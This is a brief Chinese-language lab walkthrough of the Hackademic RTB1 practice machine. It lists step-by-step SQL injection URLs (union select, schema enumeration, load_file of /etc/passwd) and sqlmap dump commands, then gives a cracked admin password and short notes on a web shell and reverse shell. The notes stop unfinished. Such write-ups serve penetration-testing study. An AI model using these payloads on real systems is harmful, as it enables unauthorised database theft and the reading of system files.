一、信息收集
信息收集
http://192.168.111.132/Hackademic_RTB1/?cat=1
http://192.168.111.132/Hackademic_RTB1/?cat=1%27
http://192.168.111.132/Hackademic_RTB1/?cat=1%20order%20by%201
http://192.168.111.132/Hackademic_RTB1/?cat=1%20order%20by%206
http://192.168.111.132/Hackademic_RTB1/?cat=1%20union%20select%201,2,3,4,5
http://192.168.111.132/Hackademic_RTB1/?cat=1%20and%201=1%20union%20select%201,2,3,4,5
http://192.168.111.132/Hackademic_RTB1/?cat=1%20and%201=2%20union%20select%201,2,3,4,5
http://192.168.111.132/Hackademic_RTB1/?cat=1%20and%201=2%20union%20select%201,@@version,3,4,5
http://192.168.111.132/Hackademic_RTB1/?cat=1 and 1=2 union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata
http://192.168.111.132/Hackademic_RTB1/?cat=1 and 1=2 union select 1,load_file(‘/etc/passwd’),3,4,5 from mysql.user
或者sqlmap
sqlmap -u http://192.168.111.132/Hackademic_RTB1/?cat=1 --dbs
sqlmap -u http://192.168.111.132/Hackademic_RTB1/?cat=1 --dbs --batch --dump
使用md5进行解密
账户登录GeorgeMiller权限最高
GeorgeMiller q1w2e3
进入后台页面
蚁剑连接并且反弹到kali
上传文件
编译失败
继续寻找
